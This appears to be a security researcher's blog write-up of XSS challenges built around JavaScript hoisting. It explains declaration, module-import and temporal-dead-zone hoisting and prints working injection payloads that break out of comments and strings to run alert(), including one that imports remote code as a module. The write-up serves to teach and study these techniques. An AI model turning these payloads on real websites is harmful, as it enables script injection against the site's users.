Having some fun with JavaScript hoisting

This will be a quick recap of some XSS challenges posted on Twitter during November/December of 2023, showing the usage and abuse of hoisting in JavaScript. If you have not had time to try the challenges yourself, I suggest doing that before reading any further. You learn more by banging your head against the problems presented here rather than just reading the solutions.

That said, if you have tried but failed, there is no shame in reading the post. Remember to go back and try the payloads and ensure you understand WHY they work.

Links:

https://twitter.com/Rhynorater/status/1722636015070744713
https://xss-node.glitch.me
https://try-to-catch.glitch.me

Ok, let’s go

Execute an undeclared function

Justin Gardner (@Rhynator) posted a question on Twitter where he had been asked about a peculiar code injection scenario.

We have a code injection inside the parameters of a function call

x.y(1,INJECT);

where x is not defined. I solved this using the concept known as hoisting (as we shall see further down), which was not a new concept for me, but the first time, I managed to use it in a cross-site scripting scenario. The discussions in the Twitter thread following this solution led me down a rabbit hole, taking a closer look at the concept of hoisting in Javascript. This deep dive triggered me to create two related XSS challenges for others to try their hands on. Before going into the solution, first, some background. Feel free to skip these parts if you are a hoist master.

Hoisting in JS

There is no point in me declaring the concept of hoisting when such a great explanation exists at MDN. They describe hoisting like this:

JavaScript Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables, classes, or imports to the top of their scope, prior to execution of the code.

There are a lot of interesting nuances to this concept in their full description of the topic, and I encourage everyone to read the entire thing. We will keep it simple and dig into some parts as we look at their implications in the following solutions.

What is essential to understand here is that a JavaScript engine will do (at least two) passes over any script. This is a big simplification, but we can think of JS execution as consisting of two steps. First, the code is parsed, which includes checking for syntax errors and converting it to an abstract syntax tree. This step also includes what we describe as hoisting, where certain forms of declarations are “moved”(hoisted) to the top of the execution stack. If the code passes the parsing step, the engine continues to execute the script.

The simplified description above contains two essential bits of knowledge that everyone trying to build more complex JS payloads should understand.

Any code (including the injected payload) must adhere to the syntax rules. Nothing will execute if the syntax is invalid anywhere in the final script.
Where in a script code is placed might have importance, but the text representation of a code snippet is not the same as what is executed by the runtime in the end. Any language might have rules that decide what order expressions are executed.

The four types of hoisting

Returning to MDN’s description of hoisting, we can read that there are four kinds of hoisting in JavaScript. Again, directly from MDN:

Being able to use a variable’s value in its scope before the line it is declared. (“Value hoisting”)

Being able to reference a variable in its scope before the line it is declared, without throwing a ReferenceError, but the value is always undefined. (“Declaration hoisting”)

The declaration of the variable causes behavior changes in its scope before the line in which it is declared.

The side effects of a declaration are produced before evaluating the rest of the code that contains it.

followed by

The four function declarations above are hoisted with type 1 behavior; var declaration is hoisted with type 2 behavior; let, const, and class declarations (also collectively called lexical declarations) are hoisted with type 3 behavior; import declarations are hoisted with type 1 and type 4 behavior.

We will keep this in mind when looking at some XSS fun.

Back to the injection

So, how could we use this to solve Justin’s previous question? As we now know, we can declare a variable x even after it is used, as its declaration will be hoisted. My solution to the problem was to inject

alert(1));function x(){}//

which will create this piece of JavaScript when injected

x.y(1,alert(1));function x(){}//)

The steps taken during execution will now be

hoist the declaration of x (value hoisting)
executes “get property y of x” (will return the value undefined)
executes “alert(1)” (evaluates parameters before we even know if the object is a function!)
executes “x.y()” and crashes as y (undefined) is no function

We do need a function declaration of x as we need x to exist to make a property access on it. However, we don’t need y to exist on x as the parameters will be evaluated before checking if the returned value of y is a function or not.

If the original question would have been formulated like this

x(1,INJECT);

we could instead have used “declaration hoisting” with var

x(1,alert(1));var x

as this version lacks any property lookup.

What if we nest the function deeper?

As a spin-off to the previous question, I posted this challenge on Twitter

With the challenge of performing code execution in this situation

<script type="module">
  x.y.z("INJECTION")
</script>

We now face two nested property lookups. This time, a simple function x(){} declaration will not suffice as execution will follow these steps

Check that x exists
Try to look up y on x, retrieving undefined
Try to do a property lookup on undefined which does not allow property access. MDN again tells us, “Accessing a property on null or undefined throws a TypeError exception”
Thus, we will not reach the function call, and no parameters will be evaluated.

An alert reader will, however, note the type="module" part of the script tag. This will make browsers treat the script as a JavaScript module. Again, there are details to modules irrelevant to this blog post. Look them up if interested. What is interesting for us is that modules allow for the usage of import and export syntax.

Returning to the four hoisting rules, we can see that import statements are hoisted using rules 1 and 4. This means import statements are both “moved” to the top and also run before anything else in the script is executed.

I got a lot of great solutions sent to me over DM (unfortunately, I was a bit unprepared and did not note down who sent what, I will try to do better in the future). Most of the initial solutions were of this type

");import {x} from "https://example.com/module.js"//

creating this script

<script type="module">
  x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
</script>

And where the supplied module file contained something along the lines of this

// module.js
var x = {
  y: {
    z: function(param) {
      eval(param);
    }
  }
};

export { x };

This is a great solution that will also ensure no errors are thrown. However, a simpler solution existed, taking “rule 4” into account. The rule states that any “side effects” of the imported script will be executed before the rest of the initial script. This allows us to simplify the payload to this,

<script type="module">
  x.y.z("");import "https://example.com/module.js"//")
</script>

where the imported script now contains

// module.js
alert(1)

I also got an interesting alternative sent in from https://twitter.com/1_am_nek0. It looked like this

x.y.z("");import "data:text/jscript,alert(1)"//")

Which I thought was very clever! Note that import statements are only valid in the context of a module script, and don’t confuse import statements with the dynamic import expression import(""), which is an expression and never hoisted.

Try to catch a hoist

To sum up the hoisting deep dive, I decided to create a challenge highlighting the final edge case from MDN

Some prefer to see let, const, and class as non-hoisting, because the temporal dead zone strictly forbids any use of the variable before its declaration. This dissent is fine, since hoisting is not a universally-agreed term. However, the temporal dead zone can cause other observable changes in its scope, which suggests there’s some form of hoisting:

Creating a situation where this third hoist issue led to an exploitable scenario was harder than the previous ones. Thus, I don’t know how prevalent this situation would be in real-life scenarios. As the only impact we can achieve with let/const/class hoisting is a ReferenceError I decided to build the challenge around a try-catch block. This also meant designing some rather strange filtering. The challenge page filters <, > and {} characters. To force the attacker to inject into both the try and the catch block without a way of altering the code blocks themselves.

This time, the scenario looked like this

<script>
(function(){
  config = {
    env: "prod"
  }  
  try {
    if(config){
      return;
    }
    // TODO handle missing config for: https://try-to-catch.glitch.me/
  } catch {
    fetch("/error", {
      method: "POST",
      body: {
        url:"https://try-to-catch.glitch.me/"
      }
    })
  }
})()
</script>

Solving this challenge requires three steps

Find the two injection points.
Use block-level hoisting to make the try block fail even if, at first, it might look impossible to escape the return statement.
Build a payload that generates valid syntax in both the try and the catch block.

The two injection points are not meant to be hard to find. They are just put there to have at least some “real life” aura. We can see that the URL is reflected in the code two times, first in a single-line comment and then in a string literal. Breaking out of a single-line comment can be done by adding any form of new-line interpreted character, and the string-literal just needs a " character.

Breaking out of the single-line comment leaves us with a scenario that looks similar to the hoist edge case from MDN

config = {
    env: "prod"
  }  
try {
  if(config){
    return;
  }
  // TODO handle missing config for: https://try-to-catch.glitch.me/ <-- Break out here
  alert(1) // <-- Add injected code here 
}

We can now add any code we want after the comment line. However, the early return will never allow us to reach this part of the code. We can, however, abuse block local hoisting here by adding either a let or a const declaration after the comment. Any such declaration will be hoisted to the top of the block, thus injecting, for example, let config will create this situation after hoisting (this is only pseudo code; the code itself is never “rewritten”)

config = {
    env: "prod"
  }  
try {
  let config;
  if(config){
    return;
  }
  // TODO handle missing config for: https://try-to-catch.glitch.me/ <-- Break out here
// <-- code is hoisted from here 
}

As we can see, the new config declaration will be defined in the lexical scope and “shadow” the outer config variable. As the new variable is only declared and not initialized, the if check will now throw a ReferenseError and move execution to the catch block.

The last step (and probably the hardest) is to generate a payload that will generate valid syntax in the catch block. This might feel contrived, but it is not an uncommon scenario to find yourself in. My initial solution when creating the challenge looked something like this

"+`\nlet config;`-alert(1)-`//`+"

Which will render like this

try {
    if(config){
      return;
    }
    // TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)`//`+"
  } catch {
    fetch("/error", {
      method: "POST",
      body: {
        url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
      }
    })
  }

Even if it can be hard to see whether the two injected statements are valid JavaScript. The try block contains

let config;`-alert(1)-`//`+"

Which declares a config variable and then a literal string -alert(1)-. The catch block payload looks like this.

"https://try-to-catch.glitch.me/"+`\nlet config;`-alert(1)-`//`+""

Which is essentially a concatenation of a series of literal strings and our function call. There are many alternatives to this payload, and I thought I could list a few of them here. You will have to validate and figure them out by yourself (note that you will need to URL encode all special characters when put in the URL, encode \n as %0a)

",/*\nlet config="*/method:alert(999),x:"

"-alert()-`\nlet config;x=/`-"/

"+alert()+"\\nlet config

This last one uses only 23 chars, which I thought was the shortest possible until @shafigullin and @hash_kitten both independently sent me this 22-char one (these characters will not render well in the text so I will post the URL encoded form). The %E2%80%A8 part of the payload represents a single character \u2028 “Line separator”

"-alert()-"%E2%80%A8let%20config

https://try-to-catch.glitch.me/”-alert()-“%E2%80%A8let%20config

What’s next

I hope the challenges and this write-up can inspire you to dig into other parts of the JavaScript specification/implementation. If you don’t feel like reading the ECMAScript specification and want a more condensed summary of the parts of JavaScript that are useful in these scenarios, I highly recommend Gareth Heyes’s book JavaScript for Hackers. I have not had time to read the full book yet, but I know that it contains all the quote/newline tricks used by payloads sent in as solutions here.
I recommend MDN web docs and the full ECMAScript specification if you feel like doing some deep-diving yourself.

That’s it for now. Thanks for participating in the challenges!